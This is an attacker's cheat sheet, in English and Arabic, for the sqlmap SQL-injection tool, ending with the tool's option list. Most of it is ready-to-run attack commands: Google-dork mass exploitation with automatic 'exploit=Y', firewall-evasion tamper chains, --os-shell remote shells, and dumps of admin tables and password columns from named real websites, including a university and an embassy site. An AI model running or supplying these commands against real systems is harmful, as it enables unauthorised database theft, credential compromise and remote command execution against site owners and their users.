SQL-Map Pri8

install python lib on windows :
using : Python Package Manager (PyPM)
go start == search cmd

then write :
# pypm install python-ntlm

windows
# pip install -r requirements.txt
# pip install SomePackage
#####################################################

Running sqlmap with Google Dork :

python sqlmap.py -g 'inurl:"article.php?id="' --random-agent --batch --answer="extending=N,follow=N,keep=N,exploit=Y" --dbs --thread 5

python sqlmap.py -m simple.txt --random-agent --batch --answer="extending=N,follow=N,keep=N,exploit=Y" --thread 5 --dbs --output-dir="/tmp/data-sqli/"

-m: file that contain links need to test.

Enumerate DBMS databases:
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --dbs

Dump all DBMS databases tables entries:
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --dump-all

Enumerate DBMS database tables:
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' -D somedb --tables

Dump data from specific database or talbes:
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' -D somedb -T sometable --dump


Revershell with sqlmap:
--os-shell: revershsell by upload UDF function (not work with all case)

Custom sql query:
--sql-shell: Prompt for an interactive SQL shell (basically you can run any sql query)

resource :
https://j3ssiejjj.blogspot.com/2017/11/advanced-sqlmap-metasploit-for-sql.html
######################################################
Find sql injection :
I initially noticed that the following URLs returned the same page:

http://host/script?id=10
http://host/script?id=11-1 # same as id=10
http://host/script?id=(select 10) # same as id=10
http://host/script?id=10 and 1=1 # failed

http://host/script?id=10-- # failed
http://host/script?id=10;-- # failed
http://host/script?id=10);-- # failed
http://host/script?id=10)subquery;-- # failed

 http://host/script?id=11-(case when 1=1 then 1 else 0 end)

sqlmap.py -v 2 --url=http://mysite.com/index --user-agent=SQLMAP --delay=1 --timeout=15 --retries=2
--keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=4 --banner --is-dba --dbs --tables --technique=BEUST
-s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt --fresh-queries > /tmp/scan_out.txt

sqlmap.py --url "xxxx" --cookie "xxxxxx" -p xxxx --dbs
sqlmap.py --url "xxxx" --cookie "xxxxxx" -p xxxx --dbms "Microsoft SQL Server 2012"
sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2
sqlmap.py -r E:\zj.txt --dbms=mssql --technique=B --risk=3 --level=3 --string="1484" --dbs --current-user --current-db --users
sqlmap.py -r E:\ah.txt --dbms=mssql --technique=B --risk=3 --level=3 --string="1332" --dbs --current-user --current-db --is-DBA
sqlmap.py --random-agent --time-sec=20 --technique=BEUS --union-char=N --answers="extending=N,skip=Y,follow=N,quite=Y" -u "http://xxxxx/ecem_asso/" --data="xxxxxx --dbs

sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S
sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S --os-cmd=hostname
sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S --os-shell

--dbms=MSSQL

@############################################################

sqlmap.py -r search-test.txt -p title --technique=BEUST --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords --dbms=MySQL --dbs --risk 3 --level 3 -v 3 --prefix "'" -s D:\report\client\scan_report.txt --flush-session -t D:\report\client\scan_trace.txt --fresh-queries --batch


--batch : use the default behaviour, for example: it is not recommended -- [snip] -- Do you want to skip? [Y/n]
In this case 'Y' is default and use --batch option will skip that question and use 'Y'


SQL Injection and WAF bypass :
sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1’ --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords


General Tamper testing:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor


Oracle  :

tamper=between,charencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor

Microsoft Access:
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekey
words,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentag
e,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2rand
omblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

PostgreSQL:

--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percent
age,randomcase,securesphere,space2comment,space2plus,space2randomblank,xforwardedfor


SAP MaxDB :

--tamper=ifnull2ifisnull,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,unionalltounion,unmagic
quotes,xforwardedfor

SQLite :

--tamper=ifnull2ifisnull,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2dash,space2p
lus,unionalltounion,unmagicquotes,xforwardedfor

@############################################################

اذا فيه فورم نريد نفحصه
Auto detect the forms

$ ./sqlmap.py -u http://192.168.60.138 --forms
$ ./sqlmap.py -u http://192.168.60.138 --forms --dbms=MySQL

##########################################################3
حل مشكلة ظهور خطاء sql map connection timed out to the target URL or proxy
نضيف امر --random-agent


application to connect to DB if you have database config:
HeidiSQL


proxy sqlmap :

C:\sqlmap>sqlmap.py -u http://IP/xxxx/file.php?user_id= --proxy="http://LOCALHOST:8080" --dbs

session id :
--cookie"PHPSESSID=sf7bjdnengngobitas5827qu46"
or
--cookie"sf7bjdnengngobitas5827qu46"
############### POST SQL iNJCTION ##########################3

1. Browse to target site XXXX.COM
2. Configure Burp proxy, point browser Burp (127.0.0.1:8080) with Burp set to intercept in the proxy tab.
3. Click on the submit button on the login form
4. Burp catches the POST request and waits

sqlmap.py -r search-test.txt -p tfUPass --technique=BEUST --risk=3 --level=3 --dbs
or
sqlmap.py -r search-test.txt -p ider --dbms=MySQL --technique=BEUST --random-agent --threads 5 --level=5 --risk=3 --delay=1 --timeout=15 --retries=2 --dbs

COPY AND put post request from burp suite in search-test.txt

tfUPass= the parameter want test it like username=,password=,category,login,tfUPass=XXX ..etc


how to change technique like blind sql ..etc

--technique=BEUST

sqlmap.py -v 2 --url=http://mysite.com/index --user-agent=SQLMAP --delay=1 --timeout=15 --retries=2
--keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=4 --banner --is-dba --dbs --tables --technique=BEUST
-s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt --fresh-queries > /tmp/scan_out.txt

http://www.it-docs.net/ddata/4956.pdf


Bypass firewall :

sqlmap -u 'URL' --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords


General Tamper testing:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes


MSSQL:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor


sqlmap.py -u URL -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"

CHANGE tamper TO #

apostrophemask.py
# for Replaces apostrophe character with its UTF-8 full width counterpart EX : '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

apostrophenullencode.py
# Replaces apostrophe character with its illegal double unicode counterpart	 EX : '1 AND %271%27=%271'

appendnullbyte.py
# Appends encoded NULL byte character at the end of payload	EX : '1 AND 1=1'

base64encode.py
# Base64 all characters in a given payload	EX 'MScgQU5EIFNMRUVQKDUpIw=='

between.py
# Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'	EX: '1 AND A NOT BETWEEN 0 AND B--'

bluecoat.py
# Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator
EX : 'SELECT%09id FROM users where id LIKE 1'

chardoubleencode.py
# Double url-encodes all characters in a given payload (not processing already encoded)	EX : '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

charencode.py
# Url-encodes all characters in a given payload (not processing already encoded) EX : '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'


charunicodeencode.py
# Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) EX : '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

equaltolike.py
# Replaces all occurances of operator equal ('=') with operator 'LIKE'	EX : 'SELECT * FROM users WHERE id LIKE 1'


greatest.py
# Replaces greater than operator ('>') with 'GREATEST' counterpart	EX : '1 AND GREATEST(A,B+1)=A'


halfversionedmorekeywords.py
# Adds versioned MySQL comment before each keyword	EX : "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"


ifnull2ifisnull.py
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'	EX : 'IF(ISNULL(1),2,1)'


modsecurityversioned.py
Embraces complete query with versioned comment	# EX : '1 /*!30874AND 2>1*/--'


modsecurityzeroversioned.py
# Embraces complete query with zero-versioned comment EX : '1 /*!00000AND 2>1*/--'


multiplespaces.py
# Adds multiple spaces around SQL keywords	EX : '1 UNION SELECT foobar'


nonrecursivereplacement.py
# Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters
EX : '1 UNIOUNIONN SELESELECTCT 2--'


MORE : http://www.forkbombers.com/2013/05/sqlmaps-tamper-scripts.html
########################################################################################################

############### sqlmap ###################

sqlmap -u www.26sep.net/ntopics.php?id=8 --dbms=MySQL --risk=3 --level=3 --drop-set-cookie --random-agent --dbs

sqlmap -u http://www.hoduniv.net.ye/center.php?id=1 -D hoduniv --tables
sqlmap -u www.hoduniv.net.ye/center.php?id=1 -D hoduniv -T users -C user_id,user_name,user_type,password --dump --random-agent

---==========----------------============------------------------
#Will check URL to dump DB's with 5 threads.
./sqlmap -u <url> --dbs --threads 5
--=======================--------------===================-------
---==========----------------============------------------------
#Will grab Tables from chosen DB's with 5 threads.
./sqlmap.py -u <url> -D <database> --tables --threads 5
--=======================--------------===================-------
---============----------===============----------=----------------
#Will grab Colums from chosen database with 5 threads.
./sqlmap.py -u <url> -D <database> -T <table> --columns --threads 5
--=======================--------------===================-------
-=======----------===============----------------==================----
#Will dump column data.
./sqlmap.py -u <url> -D <database> -T <table> -U <table> --threads 5 --dump
--=======================--------------===================-------


notes sqlmap more
Hasan Alqawzai   10/14/2015   Keep this message at the top of your inbox
To: lpp@hotmail.com

---==========----------------============------------------------
#Will check URL to dump DB's with 5 threads.
./sqlmap -u <url> --dbs --threads 5
--=======================--------------===================-------
---==========----------------============------------------------
#Will grab Tables from chosen DB's with 5 threads.
./sqlmap.py -u <url> -D <database> --tables --threads 5
--=======================--------------===================-------
---============----------===============----------=----------------
#Will grab Colums from chosen database with 5 threads.
./sqlmap.py -u <url> -D <database> -T <table> --columns --threads 5
--=======================--------------===================-------
-=======----------===============----------------==================----
#Will dump column data.
./sqlmap.py -u <url> -D <database> -T <table> -U <table> --threads 5 --dump
--=======================--------------===================-------


python sqlmap.py -u www.exp.com --dbs

python sqlmap.py -u www.exp.com -D uwade_data --tables

python sqlmap.py -u www.exp.com -D uwade_data -T users --columns

python sqlmap.py -u www.exp.com -D uwade_data -T users -C user --dump

python sqlmap.py -u www.exp.com -D uwade_data -T users -C password --dump


http://pastebin.com/C9PB023W
http://pastebin.com/pGQ0z8Wb


python sqlmap.py -u http://localhost/index.php?id=1337

python sqlmap.py -u http://localhost/index.php?id=1337 --dbs
sqlmap -u http://www.amb-inde-bamako.org/newsdetail.php?id=58 -D jadon_eoimali --table
sqlmap -u http://www.amb-inde-bamako.org/newsdetail.php?id=58 -D jadon_eoimali -T eoimali_admin --columns
sqlmap -u http://www.amb-inde-bamako.org/newsdetail.php?id=58 -D jadon_eoimali -T eoimali_admin -C password --dump

-u is url website
--dbs to find DataBases
--users to find users

--tables Option to enumerate tables with sqlmap.
-D database_name to restrict result to the specified database.

--dbs List databases using sqlmap.
--users List database system users using sqlmap.
--is-dba Find Out If Session User Is Database Administrator using sqlmap.
--columns Option to enumerate columns with sqlmap.


python sqlmap.py -u http://localhost/index.php?id=1337 --dbs (and/or) --users

python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1

This tells the program to find tables (--tables) in database (-D) names: database1.
Once you execute this you will find (maybe) tons of tables. Locate the one you want...lets call it admin!


python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin

python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1 --dump-all
python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump
--dump dumps the selected tables content, --dump-all dumps EVERYTHING!

Test POST Parameters Using Sqlmap
python sqlmap.py --data "username=xyz&password=xyz&submit=xyz" -u "http://127.0.0.1:8888/cases/login.php"

By default sqlmap tests only GET parameter but you can specify POST parameters you would like to verify. Sqlmap will then test both GET and POST parameters indicated. In order to do so, add the --data option like shown below.


Sqlmap has a built-in functionality to parse all forms in a webpage and automatically test them. Even though in some cases the scan may not be as efficient as it is when manually indicating all parameters, it is still handy in many situations. Here is the syntax:

python sqlmap.py --forms -u "http(s)://target[:port]/[...]/[page]"

Parse Forms with sqlmap

python sqlmap.py --forms -u "http://synapse:8888/cases/productsCategory.php"


############################################################
xxx.com/user.php?id=1' AND 1=1 #-BR

--suffix="-BR"
وضع قيمة -br في نهاية كل كود اسكيول
--prefix="-BR"
راح يضع في بداية كل كود اسكيول
#######################################################################################################
Usage

./sqlmap.py (-d | -u | -l | -m | -r | -g | -c | --wizard | --update | --dependencies) [options]
Options

Version, help, verbosity

--version
show program's version number and exit
-h, --help
show this help message and exit
-v VERBOSE
Verbosity level: 0-6 (default 1)
Target

At least one of these options has to be specified to set the source to get target urls from.

   -d DIRECT           Direct connection to the database
   -u URL, --url=URL   Target url
   -l LIST             Parse targets from Burp or WebScarab proxy logs
   -r REQUESTFILE      Load HTTP request from a file
   -g GOOGLEDORK       Process Google dork results as target urls
   -c CONFIGFILE       Load options from a configuration INI file
Request

These options can be used to specify how to connect to the target url.

   --data=DATA         Data string to be sent through POST
   --cookie=COOKIE     HTTP Cookie header
   --cookie-urlencode  URL Encode generated cookie injections
   --drop-set-cookie   Ignore Set-Cookie header from response
   --user-agent=AGENT  HTTP User-Agent header
   --random-agent      Use randomly selected HTTP User-Agent header
   --referer=REFERER   HTTP Referer header
   --headers=HEADERS   Extra HTTP headers newline separated
   --auth-type=ATYPE   HTTP authentication type (Basic, Digest or NTLM)
   --auth-cred=ACRED   HTTP authentication credentials (name:password)
   --auth-cert=ACERT   HTTP authentication certificate (key_file,cert_file)
   --proxy=PROXY       Use a HTTP proxy to connect to the target url
   --proxy-cred=PCRED  HTTP proxy authentication credentials (name:password)
   --ignore-proxy      Ignore system default HTTP proxy
   --delay=DELAY       Delay in seconds between each HTTP request
   --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
   --retries=RETRIES   Retries when the connection timeouts (default 3)
   --scope=SCOPE       Regexp to filter targets from provided proxy log
   --safe-url=SAFURL   Url address to visit frequently during testing
   --safe-freq=SAFREQ  Test requests between two visits to a given safe url
Optimization

These options can be used to optimize the performance of sqlmap.

   -o                  Turn on all optimization switches
   --predict-output    Predict common queries output
   --keep-alive        Use persistent HTTP(s) connections
   --null-connection   Retrieve page length without actual HTTP response body
   --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
Injection

These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts.

   -p TESTPARAMETER    Testable parameter(s)
   --dbms=DBMS         Force back-end DBMS to this value
   --os=OS             Force back-end DBMS operating system to this value
   --prefix=PREFIX     Injection payload prefix string
   --suffix=SUFFIX     Injection payload suffix string
   --tamper=TAMPER     Use given script(s) for tampering injection data
Detection

These options can be used to specify how to parse and compare page content from HTTP responses when using blind SQL injection technique.

   --level=LEVEL       Level of tests to perform (1-5, default 1)
   --risk=RISK         Risk of tests to perform (0-3, default 1)
   --string=STRING     String to match in page when the query is valid
   --regexp=REGEXP     Regexp to match in page when the query is valid
   --text-only         Compare pages based only on the textual content
Techniques

These options can be used to tweak testing of specific SQL injection techniques.

   --technique=TECH    SQL injection techniques to test for (default BEUST)
   --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
   --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
   --union-char=UCHAR  Character to use for bruteforcing number of columns
Fingerprint

   -f, --fingerprint   Perform an extensive DBMS version fingerprint
Enumeration

These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.

   -b, --banner        Retrieve DBMS banner
   --current-user      Retrieve DBMS current user
   --current-db        Retrieve DBMS current database
   --is-dba            Detect if the DBMS current user is DBA
   --users             Enumerate DBMS users
   --passwords         Enumerate DBMS users password hashes
   --privileges        Enumerate DBMS users privileges
   --roles             Enumerate DBMS users roles
   --dbs               Enumerate DBMS databases
   --tables            Enumerate DBMS database tables
   --columns           Enumerate DBMS database table columns
   --dump              Dump DBMS database table entries
   --dump-all          Dump all DBMS databases tables entries
   --search            Search column(s), table(s) and/or database name(s)
   -D DB               DBMS database to enumerate
   -T TBL              DBMS database table to enumerate
   -C COL              DBMS database table column to enumerate
   -U USER             DBMS user to enumerate
   --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
   --start=LIMITSTART  First query output entry to retrieve
   --stop=LIMITSTOP    Last query output entry to retrieve
   --first=FIRSTCHAR   First query output word character to retrieve
   --last=LASTCHAR     Last query output word character to retrieve
   --sql-query=QUERY   SQL statement to be executed
   --sql-shell         Prompt for an interactive SQL shell
Brute force

These options can be used to run brute force checks.

   --common-tables     Check existence of common tables
   --common-columns    Check existence of common columns
User-defined function injection

These options can be used to create custom user-defined functions.

   --udf-inject        Inject custom user-defined functions
   --shared-lib=SHLIB  Local path of the shared library
File system access

These options can be used to access the back-end database management system underlying file system.

   --file-read=RFILE   Read a file from the back-end DBMS file system
   --file-write=WFILE  Write a local file on the back-end DBMS file system
   --file-dest=DFILE   Back-end DBMS absolute filepath to write to
Operating system access

These options can be used to access the back-end database management system underlying operating system.

   --os-cmd=OSCMD      Execute an operating system command
   --os-shell          Prompt for an interactive operating system shell
   --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
   --os-smbrelay       One click prompt for an OOB shell, meterpreter or VNC
   --os-bof            Stored procedure buffer overflow exploitation
   --priv-esc          Database process' user privilege escalation
   --msf-path=MSFPATH  Local path where Metasploit Framework 3 is installed
   --tmp-path=TMPPATH  Remote absolute path of temporary files directory
Windows registry access

These options can be used to access the back-end database management system Windows registry.

   --reg-read          Read a Windows registry key value
   --reg-add           Write a Windows registry key value data
   --reg-del           Delete a Windows registry key value
   --reg-key=REGKEY    Windows registry key
   --reg-value=REGVAL  Windows registry key value
   --reg-data=REGDATA  Windows registry key value data
   --reg-type=REGTYPE  Windows registry key value type
General

These options can be used to set some general working parameters.

   -t TRAFFICFILE      Log all HTTP traffic into a textual file
   -s SESSIONFILE      Save and resume all data retrieved on a session file
   --flush-session     Flush session file for current target
   --fresh-queries     Ignores query results stored in session file
   --eta               Display for each output the estimated time of arrival
   --update            Update sqlmap
   --save              Save options on a configuration INI file
   --batch             Never ask for user input, use the default behaviour
Miscellaneous

   --beep              Alert when sql injection found
   --check-payload     IDS detection testing of injection payloads
   --cleanup           Clean up the DBMS by sqlmap specific UDF and tables
   --forms             Parse and test forms on target url
   --gpage=GOOGLEPAGE  Use Google dork results from specified page number
   --page-rank         Display page rank (PR) for Google dork results
   --parse-errors      Parse DBMS error messages from response pages
   --replicate         Replicate dumped data into a sqlite3 database
   --tor               Use default Tor (Vidalia/Privoxy/Polipo) proxy address
   --wizard            Simple wizard interface for beginner user
##########################################################################################